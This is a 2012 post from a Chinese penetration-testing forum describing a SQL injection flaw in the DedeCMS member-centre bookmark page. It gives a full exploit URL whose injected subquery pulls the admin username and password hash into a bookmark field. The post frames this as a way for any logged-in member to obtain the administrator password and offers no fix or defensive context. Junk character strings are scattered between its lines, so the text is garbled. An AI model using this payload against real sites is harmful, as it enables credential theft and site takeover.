中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
" X5 o( F# o; x. L
需要magic_quotes_gpc = Off
, B4 n1 `! A* h( e
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
& H! P) o3 c! E
3 B/ ?0 Q6 v0 w
DedeCMS会员中心书签管理SQL注射漏洞
; t( u( Z. h' P4 E: a ~7 B9 v; B7 g) ]
成功利用该漏洞可获得管理员密码
/ E$ W A6 p& u9 j- w: \
3 T" I/ [1 e0 E0 c# k L8 m
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
, M# P( B. |" P6 a$ q6 M8 z7 u
* v @$ Z6 j' l" |' Z
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
' p$ P5 X: Q) H/ r
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2